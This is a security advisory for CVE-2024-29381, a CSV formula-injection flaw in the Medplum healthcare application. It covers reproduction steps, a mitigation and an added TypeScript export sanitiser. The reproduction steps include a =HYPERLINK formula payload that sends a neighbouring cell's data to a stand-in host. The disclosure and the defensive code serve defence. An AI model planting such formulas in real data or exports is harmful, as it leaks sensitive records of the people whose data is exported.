CVE Number
CVE-2024-29381
Loginsoft ID
Loginsoft-2024-1012
Description
The application “Medplum” is affected by a CSV/formula injection vulnerability that can expose sensitive data. An attacker can inject a malicious payload into input fields. When a high-privileged user later exports the data as CSV and opens the file, the injected payload may be executed.
CWE
CWE-1236: Improper Neutralization of Formula Elements in a CSV File
Affected Versions
< v3.0.8
CVSS
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N 6.8 (Medium)
Steps To Reproduce
- Create a new patient whose gender field contains the payload `=HYPERLINK("http://localhost:8181/?data="&F3,"Click Me")`.
- Export the patient data in CSV format.
- Open the CSV file, press the Ctrl key, and left-click on the cell with the value Click Me.
- Doing this exposes the sensitive data of the user located in cell F3.
Impact
Exposure of sensitive data.
Mitigation
Convert each field into text when exporting as CSV. Additionally, add filters to the input fields.
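One way to apply the "convert each field into text" step at export time, as an added example that is not Medplum's fix or code. The names `toCsvCell`, `toCsv` and the sample rows are hypothetical; the approach is the commonly recommended one of prefixing a single quote to cells that start with a formula trigger and always quoting the field.

```typescript
// Added example: hypothetical helper names, not Medplum's code.
type Cell = string | number | boolean | null | undefined;

// A cell is read as a formula if it starts with =, +, - or @ (optionally
// after whitespace), or with a tab or carriage return.
const FORMULA_START = /^(?:[\t\r]|\s*[=+\-@])/;

// Render one value as a CSV field that a spreadsheet will treat as text.
function toCsvCell(value: Cell): string {
  if (value === null || value === undefined) {
    return '""';
  }
  // Real numbers and booleans cannot carry a payload; keep them usable.
  if (typeof value === "number" || typeof value === "boolean") {
    return String(value);
  }
  // A leading single quote stops the cell being evaluated as a formula.
  const text = FORMULA_START.test(value) ? "'" + value : value;
  // Always quote and double embedded quotes so a payload cannot close the
  // field early and start a new cell.
  return '"' + text.replace(/"/g, '""') + '"';
}

// Join rows into a CSV document with CRLF line endings.
function toCsv(rows: Cell[][]): string {
  return rows.map((row) => row.map(toCsvCell).join(",")).join("\r\n");
}

// Constructed sample export: row 2 carries the payload from the steps above.
const SAMPLE_ROWS: Cell[][] = [
  ["id", "name", "gender", "balance"],
  ["1", "Alice Example", "female", -12.5],
  ["2", "Bob Example", '=HYPERLINK("http://localhost:8181/?data="&F3,"Click Me")', 40],
];

console.log(toCsv(SAMPLE_ROWS));
```

String values that legitimately begin with `-` or `+` will also show the added quote, which is the usual trade-off of this approach.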
Fix
Discovered Date
15 February 2024
Reported Date
19 February 2024
Patched Date
03 March 2024
Credit
Saharsh Agrawal

